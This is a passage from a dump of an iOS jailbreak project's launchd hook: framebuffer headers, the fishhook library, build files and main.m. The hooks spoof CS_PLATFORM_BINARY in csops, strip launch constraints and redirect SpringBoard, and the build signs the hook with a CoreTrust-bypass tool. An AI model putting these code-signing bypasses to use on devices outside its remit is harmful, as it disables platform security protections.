_IOMobileFramebufferGetGammaTable, _IOMobileFramebufferGetHDCPAuthenticationProtocol, _IOMobileFramebufferGetHDCPDownstreamState, _IOMobileFramebufferGetHDCPRunLoopSource, _IOMobileFramebufferGetHotPlugRunLoopSource, _IOMobileFramebufferGetID, _IOMobileFramebufferGetLayerDefaultSurface, _IOMobileFramebufferGetLinkQuality, _IOMobileFramebufferGetMainDisplay, _IOMobileFramebufferGetMatrix, _IOMobileFramebufferGetMirrorError, _IOMobileFramebufferGetProtectionOptions, _IOMobileFramebufferGetRunLoopSource, _IOMobileFramebufferGetSecondaryDisplay, _IOMobileFramebufferGetServiceObject, _IOMobileFramebufferGetSupportedDigitalOutModes, _IOMobileFramebufferGetTypeID, _IOMobileFramebufferGetVSyncRunLoopSource, _IOMobileFramebufferGetWirelessSurface, _IOMobileFramebufferGetWirelessSurfaceWithOptions, _IOMobileFramebufferHDCPGetReply, _IOMobileFramebufferHDCPSendRequest, _IOMobileFramebufferInstallVirtualDisplay, _IOMobileFramebufferInstallVirtualDisplays, _IOMobileFramebufferIsMainDisplay, _IOMobileFramebufferKernelTests, _IOMobileFramebufferOpen, _IOMobileFramebufferOpenByName, _IOMobileFramebufferReadyForSwap, _IOMobileFramebufferRequestPowerChange, _IOMobileFramebufferSPLCGetBrightness, _IOMobileFramebufferSPLCSetBrightness, _IOMobileFramebufferScheduleWithDispatchQueue, _IOMobileFramebufferSetBlock, _IOMobileFramebufferSetBrightnessControlCallback, _IOMobileFramebufferSetBrightnessCorrection, _IOMobileFramebufferSetCanvasSize, _IOMobileFramebufferSetColorRemapMode, _IOMobileFramebufferSetContrast, _IOMobileFramebufferSetDebugFlags, _IOMobileFramebufferSetDigitalOutMode, _IOMobileFramebufferSetDisplayDevice, _IOMobileFramebufferSetDroppable, _IOMobileFramebufferSetFlags, _IOMobileFramebufferSetGammaTable, _IOMobileFramebufferSetIdleBuffer, _IOMobileFramebufferSetLine21Data, _IOMobileFramebufferSetMatrix, _IOMobileFramebufferSetMirrorContentRegion, _IOMobileFramebufferSetParameter, _IOMobileFramebufferSetRenderingAngle, _IOMobileFramebufferSetTVOutMode, _IOMobileFramebufferSetTVOutSignalType, _IOMobileFramebufferSetUnderrunColor, _IOMobileFramebufferSetVideoDACGain, _IOMobileFramebufferSetWSSInfo, _IOMobileFramebufferSetWhiteOnBlackMode, _IOMobileFramebufferSupportedFrameInfo, _IOMobileFramebufferSurfaceIsReplaceable, _IOMobileFramebufferSwapActiveRegion, _IOMobileFramebufferSwapBegin, _IOMobileFramebufferSwapCancel, _IOMobileFramebufferSwapCancelAll, _IOMobileFramebufferSwapDirtyRegion, _IOMobileFramebufferSwapEnd, _IOMobileFramebufferSwapSetBackgroundColor, _IOMobileFramebufferSwapSetBrightness, _IOMobileFramebufferSwapSetBrightnessLimit, _IOMobileFramebufferSwapSetColorMatrix, _IOMobileFramebufferSwapSetDisplayEdr, _IOMobileFramebufferSwapSetGammaTable, _IOMobileFramebufferSwapSetICCCurve, _IOMobileFramebufferSwapSetICCMatrix, _IOMobileFramebufferSwapSetLayer, _IOMobileFramebufferSwapSetParams, _IOMobileFramebufferSwapSetTimestamp, _IOMobileFramebufferSwapSetTimestamps, _IOMobileFramebufferSwapSetUISubRegion, _IOMobileFramebufferSwapSetVideoDestEdgeAlpha, _IOMobileFramebufferSwapSignal, _IOMobileFramebufferSwapSubtitleRegion, _IOMobileFramebufferSwapUIEdgeBlendMode, _IOMobileFramebufferSwapWait, _IOMobileFramebufferSwapWaitWithTimeout, _IOMobileFramebufferSwapWorkaroundSettings, _IOMobileFramebufferUnscheduleFromDispatchQueue, _IOMobileFramebufferWaitSurface, _kIOMFB_TotalSwaps, _kIOMFB_TotalVBLs ] ... ================================================ FILE: RootHelperSample/launchdshim/launchdhook/IOMobileFramebuffer.h ================================================ #ifndef IOMOBILEFRAMEBUFFER_IOMOBILEFRAMEBUFFER_H #define IOMOBILEFRAMEBUFFER_IOMOBILEFRAMEBUFFER_H #include #include #include #include typedef IOReturn IOMobileFramebufferReturn; typedef struct __IOMobileFramebuffer *IOMobileFramebufferRef; typedef CGSize IOMobileFramebufferDisplaySize; __BEGIN_DECLS IOMobileFramebufferReturn IOMobileFramebufferGetMainDisplay(IOMobileFramebufferRef *pointer); IOMobileFramebufferReturn IOMobileFramebufferGetDisplaySize(IOMobileFramebufferRef pointer, IOMobileFramebufferDisplaySize *size); IOMobileFramebufferReturn IOMobileFramebufferGetLayerDefaultSurface(IOMobileFramebufferRef pointer, int surface, IOSurfaceRef *buffer); IOMobileFramebufferReturn IOMobileFramebufferSwapBegin(IOMobileFramebufferRef pointer, int *token); IOMobileFramebufferReturn IOMobileFramebufferSwapEnd(IOMobileFramebufferRef pointer); IOMobileFramebufferReturn IOMobileFramebufferSwapSetLayer(IOMobileFramebufferRef pointer, int layerid, IOSurfaceRef buffer, CGRect bounds, CGRect frame, int flags); __END_DECLS #endif ================================================ FILE: RootHelperSample/launchdshim/launchdhook/LICENCE ================================================ MIT License Copyright (c) 2023 Hariz Shirazi (https://bomberfish.ca) Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ================================================ FILE: RootHelperSample/launchdshim/launchdhook/Makefile ================================================ TARGET := iphone:clang:latest:15.0 ARCHS = arm64e THEOS_PACKAGE_SCHEME = roothide include $(THEOS)/makefiles/common.mk LIBRARY_NAME = launchdhook launchdhook_FILES = $(wildcard *.m) $(wildcard *.c) $(wildcard verbose/*.m) launchdhook_CFLAGS = -fobjc-arc -isystem "../../../usprebooter/Private Headers I stole from the macOS SDK" -Wno-error launchdhook_CODESIGN_FLAGS = -S../launchdentitlements.plist launchdhook_LDFLAGS = -F./Frameworks launchdhook_EXTRA_FRAMEWORKS += IOMobileFramebuffer IOSurface after-package:: echo "[*] Signing lunchd hook" ../../../ChOma/output/tests/ct_bypass -i .theos/obj/debug/launchdhook.dylib -o launchdhooksigned.dylib include $(THEOS_MAKE_PATH)/library.mk ================================================ FILE: RootHelperSample/launchdshim/launchdhook/README.md ================================================ # FBWrite Write text to the framebuffer, with style. ================================================ FILE: RootHelperSample/launchdshim/launchdhook/build.sh ================================================ make /Users/ibarahime/ChOma/ct_bypass -i .theos/obj/debug/launchdhook.dylib -r -o launchdhooksigned.dylib ================================================ FILE: RootHelperSample/launchdshim/launchdhook/control ================================================ Package: ca.bomberfish.fbwrite Name: FBWrite Version: 0.0.1 Architecture: iphoneos-arm Description: Write to the framebuffer with style. Maintainer: BomberFish Industries Author: BomberFish Industries Section: System Tag: role::hacker ================================================ FILE: RootHelperSample/launchdshim/launchdhook/entitlements.plist ================================================ get-task-allow platform-application com.apple.private.security.no-container com.apple.private.allow-explicit-graphics-priority com.apple.security.iokit-user-client-class IOSurfaceRootUserClient IOMobileFramebufferUserClient IOHIDEventServiceUserClient ================================================ FILE: RootHelperSample/launchdshim/launchdhook/fishhook.c ================================================ // Copyright (c) 2013, Facebook, Inc. // All rights reserved. // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are met: // * Redistributions of source code must retain the above copyright notice, // this list of conditions and the following disclaimer. // * Redistributions in binary form must reproduce the above copyright notice, // this list of conditions and the following disclaimer in the documentation // and/or other materials provided with the distribution. // * Neither the name Facebook nor the names of its contributors may be used to // endorse or promote products derived from this software without specific // prior written permission. // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE // DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE // FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL // DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER // CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, // OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #include "fishhook.h" #include #include #include #include #include #include #include #include #include #include #include #include #if __has_include() #include #endif #ifdef __LP64__ typedef struct mach_header_64 mach_header_t; typedef struct segment_command_64 segment_command_t; typedef struct section_64 section_t; typedef struct nlist_64 nlist_t; #define LC_SEGMENT_ARCH_DEPENDENT LC_SEGMENT_64 #else typedef struct mach_header mach_header_t; typedef struct segment_command segment_command_t; typedef struct section section_t; typedef struct nlist nlist_t; #define LC_SEGMENT_ARCH_DEPENDENT LC_SEGMENT #endif #ifndef SEG_DATA_CONST #define SEG_DATA_CONST "__DATA_CONST" #endif struct rebindings_entry { struct rebinding *rebindings; size_t rebindings_nel; struct rebindings_entry *next; }; static struct rebindings_entry *_rebindings_head; static int prepend_rebindings(struct rebindings_entry **rebindings_head, struct rebinding rebindings[], size_t nel) { struct rebindings_entry *new_entry = (struct rebindings_entry *) malloc(sizeof(struct rebindings_entry)); if (!new_entry) { return -1; } new_entry->rebindings = (struct rebinding *) malloc(sizeof(struct rebinding) * nel); if (!new_entry->rebindings) { free(new_entry); return -1; } memcpy(new_entry->rebindings, rebindings, sizeof(struct rebinding) * nel); new_entry->rebindings_nel = nel; new_entry->next = *rebindings_head; *rebindings_head = new_entry; return 0; } #if 0 static int get_protection(void *addr, vm_prot_t *prot, vm_prot_t *max_prot) { mach_port_t task = mach_task_self(); vm_size_t size = 0; vm_address_t address = (vm_address_t)addr; memory_object_name_t object; #ifdef __LP64__ mach_msg_type_number_t count = VM_REGION_BASIC_INFO_COUNT_64; vm_region_basic_info_data_64_t info; kern_return_t info_ret = vm_region_64( task, &address, &size, VM_REGION_BASIC_INFO_64, (vm_region_info_64_t)&info, &count, &object); #else mach_msg_type_number_t count = VM_REGION_BASIC_INFO_COUNT; vm_region_basic_info_data_t info; kern_return_t info_ret = vm_region(task, &address, &size, VM_REGION_BASIC_INFO, (vm_region_info_t)&info, &count, &object); #endif if (info_ret == KERN_SUCCESS) { if (prot != NULL) *prot = info.protection; if (max_prot != NULL) *max_prot = info.max_protection; return 0; } return -1; } #endif static void perform_rebinding_with_section(struct rebindings_entry *rebindings, section_t *section, intptr_t slide, nlist_t *symtab, char *strtab, uint32_t *indirect_symtab) { uint32_t *indirect_symbol_indices = indirect_symtab + section->reserved1; void **indirect_symbol_bindings = (void **)((uintptr_t)slide + section->addr); for (uint i = 0; i < section->size / sizeof(void *); i++) { uint32_t symtab_index = indirect_symbol_indices[i]; if (symtab_index == INDIRECT_SYMBOL_ABS || symtab_index == INDIRECT_SYMBOL_LOCAL || symtab_index == (INDIRECT_SYMBOL_LOCAL | INDIRECT_SYMBOL_ABS)) { continue; } uint32_t strtab_offset = symtab[symtab_index].n_un.n_strx; char *symbol_name = strtab + strtab_offset; bool symbol_name_longer_than_1 = symbol_name[0] && symbol_name[1]; struct rebindings_entry *cur = rebindings; while (cur) { for (uint j = 0; j < cur->rebindings_nel; j++) { if (symbol_name_longer_than_1 && strcmp(&symbol_name[1], cur->rebindings[j].name) == 0) { kern_return_t err; if (cur->rebindings[j].replaced != NULL && indirect_symbol_bindings[i] != cur->rebindings[j].replacement) *(cur->rebindings[j].replaced) = indirect_symbol_bindings[i]; /** * 1. Moved the vm protection modifying codes to here to reduce the * changing scope. * 2. Adding VM_PROT_WRITE mode unconditionally because vm_region * API on some iOS/Mac reports mismatch vm protection attributes. * -- Lianfu Hao Jun 16th, 2021 **/ err = vm_protect (mach_task_self (), (uintptr_t)indirect_symbol_bindings, section->size, 0, VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY); if (err == KERN_SUCCESS) { /** * Once we failed to change the vm protection, we * MUST NOT continue the following write actions! * iOS 15 has corrected the const segments prot. * -- Lionfore Hao Jun 11th, 2021 **/ #if !__has_feature(ptrauth_calls) indirect_symbol_bindings[i] = cur->rebindings[j].replacement; #else void *replacement = cur->rebindings[j].replacement; if (!strcmp(section->sectname, "__auth_got")) { void *stripped = ptrauth_strip(replacement, ptrauth_key_process_independent_code); replacement = ptrauth_sign_unauthenticated(stripped, ptrauth_key_process_independent_code, &indirect_symbol_bindings[i]); } indirect_symbol_bindings[i] = replacement; #endif } goto symbol_loop; } } cur = cur->next; } symbol_loop:; } } static void rebind_symbols_for_image(struct rebindings_entry *rebindings, const struct mach_header *header, intptr_t slide) { Dl_info info; if (dladdr(header, &info) == 0) { return; } segment_command_t *cur_seg_cmd; segment_command_t *linkedit_segment = NULL; struct symtab_command* symtab_cmd = NULL; struct dysymtab_command* dysymtab_cmd = NULL; uintptr_t cur = (uintptr_t)header + sizeof(mach_header_t); for (uint i = 0; i < header->ncmds; i++, cur += cur_seg_cmd->cmdsize) { cur_seg_cmd = (segment_command_t *)cur; if (cur_seg_cmd->cmd == LC_SEGMENT_ARCH_DEPENDENT) { if (strcmp(cur_seg_cmd->segname, SEG_LINKEDIT) == 0) { linkedit_segment = cur_seg_cmd; } } else if (cur_seg_cmd->cmd == LC_SYMTAB) { symtab_cmd = (struct symtab_command*)cur_seg_cmd; } else if (cur_seg_cmd->cmd == LC_DYSYMTAB) { dysymtab_cmd = (struct dysymtab_command*)cur_seg_cmd; } } if (!symtab_cmd || !dysymtab_cmd || !linkedit_segment || !dysymtab_cmd->nindirectsyms) { return; } // Find base symbol/string table addresses uintptr_t linkedit_base = (uintptr_t)slide + linkedit_segment->vmaddr - linkedit_segment->fileoff; nlist_t *symtab = (nlist_t *)(linkedit_base + symtab_cmd->symoff); char *strtab = (char *)(linkedit_base + symtab_cmd->stroff); // Get indirect symbol table (array of uint32_t indices into symbol table) uint32_t *indirect_symtab = (uint32_t *)(linkedit_base + dysymtab_cmd->indirectsymoff); cur = (uintptr_t)header + sizeof(mach_header_t); for (uint i = 0; i < header->ncmds; i++, cur += cur_seg_cmd->cmdsize) { cur_seg_cmd = (segment_command_t *)cur; if (cur_seg_cmd->cmd == LC_SEGMENT_ARCH_DEPENDENT) { if (strcmp(cur_seg_cmd->segname, SEG_DATA) != 0 && strcmp(cur_seg_cmd->segname, SEG_DATA_CONST) != 0) { continue; } for (uint j = 0; j < cur_seg_cmd->nsects; j++) { section_t *sect = (section_t *)(cur + sizeof(segment_command_t)) + j; if ((sect->flags & SECTION_TYPE) == S_LAZY_SYMBOL_POINTERS) { perform_rebinding_with_section(rebindings, sect, slide, symtab, strtab, indirect_symtab); } if ((sect->flags & SECTION_TYPE) == S_NON_LAZY_SYMBOL_POINTERS) { perform_rebinding_with_section(rebindings, sect, slide, symtab, strtab, indirect_symtab); } } } } } static void _rebind_symbols_for_image(const struct mach_header *header, intptr_t slide) { rebind_symbols_for_image(_rebindings_head, header, slide); } int rebind_symbols_image(void *header, intptr_t slide, struct rebinding rebindings[], size_t rebindings_nel) { struct rebindings_entry *rebindings_head = NULL; int retval = prepend_rebindings(&rebindings_head, rebindings, rebindings_nel); rebind_symbols_for_image(rebindings_head, (const struct mach_header *) header, slide); if (rebindings_head) { free(rebindings_head->rebindings); } free(rebindings_head); return retval; } int rebind_symbols(struct rebinding rebindings[], size_t rebindings_nel) { int retval = prepend_rebindings(&_rebindings_head, rebindings, rebindings_nel); if (retval < 0) { return retval; } // If this was the first call, register callback for image additions (which is also invoked for // existing images, otherwise, just run on existing images if (!_rebindings_head->next) { _dyld_register_func_for_add_image(_rebind_symbols_for_image); } else { uint32_t c = _dyld_image_count(); for (uint32_t i = 0; i < c; i++) { _rebind_symbols_for_image(_dyld_get_image_header(i), _dyld_get_image_vmaddr_slide(i)); } } return retval; } ================================================ FILE: RootHelperSample/launchdshim/launchdhook/fishhook.h ================================================ // Copyright (c) 2013, Facebook, Inc. // All rights reserved. // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are met: // * Redistributions of source code must retain the above copyright notice, // this list of conditions and the following disclaimer. // * Redistributions in binary form must reproduce the above copyright notice, // this list of conditions and the following disclaimer in the documentation // and/or other materials provided with the distribution. // * Neither the name Facebook nor the names of its contributors may be used to // endorse or promote products derived from this software without specific // prior written permission. // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE // DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE // FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL // DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER // CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, // OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #ifndef fishhook_h #define fishhook_h #include #include #if !defined(FISHHOOK_EXPORT) #define FISHHOOK_VISIBILITY __attribute__((visibility("hidden"))) #else #define FISHHOOK_VISIBILITY __attribute__((visibility("default"))) #endif #ifdef __cplusplus extern "C" { #endif //__cplusplus /* * A structure representing a particular intended rebinding from a symbol * name to its replacement */ struct rebinding { const char *name; void *replacement; void **replaced; }; /* * For each rebinding in rebindings, rebinds references to external, indirect * symbols with the specified name to instead point at replacement for each * image in the calling process as well as for all future images that are loaded * by the process. If rebind_functions is called more than once, the symbols to * rebind are added to the existing list of rebindings, and if a given symbol * is rebound more than once, the later rebinding will take precedence. */ FISHHOOK_VISIBILITY int rebind_symbols(struct rebinding rebindings[], size_t rebindings_nel); /* * Rebinds as above, but only in the specified image. The header should point * to the mach-o header, the slide should be the slide offset. Others as above. */ FISHHOOK_VISIBILITY int rebind_symbols_image(void *header, intptr_t slide, struct rebinding rebindings[], size_t rebindings_nel); #ifdef __cplusplus } #endif //__cplusplus #endif //fishhook_h ================================================ FILE: RootHelperSample/launchdshim/launchdhook/main.m ================================================ #include #include #include #include #include #include #include "fishhook.h" #include #include #include #include #include #include #include #define PT_DETACH 11 /* stop tracing a process */ #define PT_ATTACHEXC 14 /* attach to running process with signal exception */ int ptrace(int request, pid_t pid, caddr_t addr, int data); int posix_spawnattr_set_launch_type_np(posix_spawnattr_t *attr, uint8_t launch_type); int (*orig_csops)(pid_t pid, unsigned int ops, void * useraddr, size_t usersize); int (*orig_csops_audittoken)(pid_t pid, unsigned int ops, void * useraddr, size_t usersize, audit_token_t * token); int (*orig_posix_spawn)(pid_t * __restrict pid, const char * __restrict path, const posix_spawn_file_actions_t *file_actions, const posix_spawnattr_t * __restrict attrp, char *const argv[ __restrict], char *const envp[ __restrict]); int (*orig_posix_spawnp)(pid_t *restrict pid, const char *restrict path, const posix_spawn_file_actions_t *restrict file_actions, const posix_spawnattr_t *restrict attrp, char *const argv[restrict], char *const envp[restrict]); int hooked_csops(pid_t pid, unsigned int ops, void *useraddr, size_t usersize) { int result = orig_csops(pid, ops, useraddr, usersize); if (result != 0) return result; if (ops == 0) { // CS_OPS_STATUS *((uint32_t *)useraddr) |= 0x4000000; // CS_PLATFORM_BINARY } return result; } int hooked_csops_audittoken(pid_t pid, unsigned int ops, void * useraddr, size_t usersize, audit_token_t * token) { int result = orig_csops_audittoken(pid, ops, useraddr, usersize, token); if (result != 0) return result; if (ops == 0) { // CS_OPS_STATUS *((uint32_t *)useraddr) |= 0x4000000; // CS_PLATFORM_BINARY } return result; } void change_launchtype(const posix_spawnattr_t *attrp, const char *restrict path) { const char *prefixes[] = { "/private/var", "/var", "/private/preboot" }; if (__builtin_available(macOS 13.0, iOS 16.0, tvOS 16.0, watchOS 9.0, *)) { for (size_t i = 0; i < sizeof(prefixes) / sizeof(prefixes[0]); ++i) { size_t prefix_len = strlen(prefixes[i]); if (strncmp(path, prefixes[i], prefix_len) == 0) { // FILE *file = fopen("/var/mobile/lunchd.log", "a"); if (/*file && */attrp != 0) { // char output[1024]; // sprintf(output, "[lunchd] setting launch type path %s to 0\n", path); // fputs(output, file); // fclose(file); posix_spawnattr_set_launch_type_np((posix_spawnattr_t *)attrp, 0); // needs ios 16.0 sdk } break; } } } } int hooked_posix_spawn(pid_t *pid, const char *path, const posix_spawn_file_actions_t *file_actions, const posix_spawnattr_t *attrp, char *const argv[], char *const envp[]) { change_launchtype(attrp, path); // const char *launchdPath = "/sbin/launchd"; // const char *coolerLaunchd = jbroot("lunchd"); // if (!strncmp(path, launchdPath, strlen(launchdPath))) { // posix_spawnattr_set_launch_type_np((posix_spawnattr_t *)attrp, 0); // path = coolerLaunchd; // return orig_posix_spawn(pid, path, file_actions, attrp, argv, envp); // } return orig_posix_spawn(pid, path, file_actions, attrp, argv, envp); } int hooked_posix_spawnp(pid_t *restrict pid, const char *restrict path, const posix_spawn_file_actions_t *restrict file_actions, posix_spawnattr_t *attrp, char *const argv[restrict], char *const envp[restrict]) { change_launchtype(attrp, path); const char *springboardPath = "/System/Library/CoreServices/SpringBoard.app/SpringBoard"; const char *coolerSpringboard = jbroot("/System/Library/CoreServices/SpringBoard.app/SpringBoard"); if (!strncmp(path, springboardPath, strlen(springboardPath))) { posix_spawnattr_set_launch_type_np((posix_spawnattr_t *)attrp, 0); // FILE *file = fopen("/var/mobile/lunchd.log", "a"); // char output[1024]; // sprintf(output, "[lunchd] changing path %s to %s\n", path, coolerSpringboard); // fputs(output, file); path = coolerSpringboard; // fclose(file); return posix_spawnp(pid, path, file_actions, (posix_spawnattr_t *)attrp, argv, envp); } return orig_posix_spawnp(pid, path, file_actions, (posix_spawnattr_t *)attrp, argv, envp); } bool (*xpc_dictionary_get_bool_orig)(xpc_object_t dictionary, const char *key); bool hook_xpc_dictionary_get_bool(xpc_object_t dictionary, const char *key) { if (!strcmp(key, "LogPerformanceStatistics")) return true; else return xpc_dictionary_get_bool_orig(dictionary, key); } void initVerboseFramebuffer(void); __attribute__((constructor)) static void init(int argc, char **argv) { // FILE *file; // file = fopen("/var/mobile/lunchd.log", "w"); // char output[1024]; // sprintf(output, "[lunchd] launchdhook pid %d", getpid()); // printf("[lunchd] launchdhook pid %d", getpid()); // fputs(output, file); // fclose(file); // sync(); bool verboseBoot = false; NSString *verboseBootPath = @"/var/mobile/.serotonin_verbose"; NSString *happyMac = @"/var/mobile/boot-happy.jp2"; NSString *sadMac = @"/var/mobile/boot-sad.jp2"; if ([NSFileManager.defaultManager fileExistsAtPath:verboseBootPath]) { verboseBoot = true; } if (verboseBoot) { initVerboseFramebuffer(); } else { // TODO: Boot splash } printf("[lunchd] launchdhook pid %d", getpid()); if (getpid() == 1) { printf("============\n"); printf("== WE ARE ==\n"); printf("== PID1 ==\n"); printf("============\n\n"); printf("Also, my parent is %d\n", getppid()); } struct rebinding rebindings[] = (struct rebinding[]){ {"csops", hooked_csops, (void *)&orig_csops}, {"csops_audittoken", hooked_csops_audittoken, (void *)&orig_csops_audittoken}, {"posix_spawn", hooked_posix_spawn, (void *)&orig_posix_spawn}, {"posix_spawnp", hooked_posix_spawnp, (void *)&orig_posix_spawnp}, {"xpc_dictionary_get_bool", hook_xpc_dictionary_get_bool, (void *)&xpc_dictionary_get_bool_orig}, }; rebind_symbols(rebindings, sizeof(rebindings)/sizeof(struct rebinding)); } ================================================ FILE: RootHelperSample/launchdshim/launchdhook/verbose/IOMobileFramebuffer.h ================================================ #ifndef IOMOBILEFRAMEBUFFER_IOMOBILEFRAMEBUFFER_H #define IOMOBILEFRAMEBUFFER_IOMOBILEFRAMEBUFFER_H #include #include #include #include typedef IOReturn IOMobileFramebufferReturn; typedef struct __IOMobileFramebuffer *IOMobileFramebufferRef; typedef CGSize IOMobileFramebufferDisplaySize; __BEGIN_DECLS IOMobileFramebufferReturn IOMobileFramebufferGetMainDisplay(IOMobileFramebufferRef *pointer); IOMobileFramebufferReturn IOMobileFramebufferGetDisplaySize(IOMobileFramebufferRef pointer, IOMobileFramebufferDisplaySize *size); IOMobileFramebufferReturn IOMobileFramebufferGetLayerDefaultSurface(IOMobileFramebufferRef pointer, int surface, IOSurfaceRef *buffer); IOMobileFramebufferReturn IOMobileFramebufferSwapBegin(IOMobileFramebufferRef pointer, int *token); IOMobileFramebufferReturn IOMobileFramebufferSwapEnd(IOMobileFramebufferRef pointer); IOMobileFramebufferReturn IOMobileFramebufferSwapSetLayer(IOMobileFramebufferRef pointer, int layerid, IOSurfaceRef buffer, CGRect bounds, CGRect frame, int flags); __END_DECLS #endif ================================================ FILE: RootHelperSample/launchdshim/launchdhook/verbose/console/iso_font.c ================================================ /* * Copyright (c) 2000 Apple Computer, Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * * This file contains Original Code and/or Modifications of Original Code * as defined in and that are subject to the Apple Public Source License * Version 2.0 (the 'License'). You may not use this file except in * compliance with the License. The rights granted to you under the License * may not be used to create, or enable the creation or redistribution of, * unlawful or unlicensed copies of an Apple operating system, or to * circumvent, violate, or enable the circumvention or violation of, any * terms of an Apple operating system software license agreement. * * Please obtain a copy of the License at * http://www.opensource.apple.com/apsl/ and read it before using this file. * * The Original Code and all software distributed under the License are * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. * Please see the License for the specific language governing rights and * limitations under the License. * * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ */ /* * @OSF_COPYRIGHT@ */ /* * ISO Latin-1 Font * * Copyright (c) 2000 * Ka-Ping Yee * * This font may be freely used for any purpose. */ /* * adjusted 'A' 'V' to improve their dense appearance (ie. lightened) * adjusted 'i' 'l' to improve their flow within a word (ie. widened) * adjusted 'E' 'F' '#' */ unsigned char iso_font[256 * 16] = { /* 0 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 1 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 2 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 3 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 4 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 5 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 6 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 7 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 8 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 9 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 10 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 11 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 12 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 13 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 14 */ 0x00, 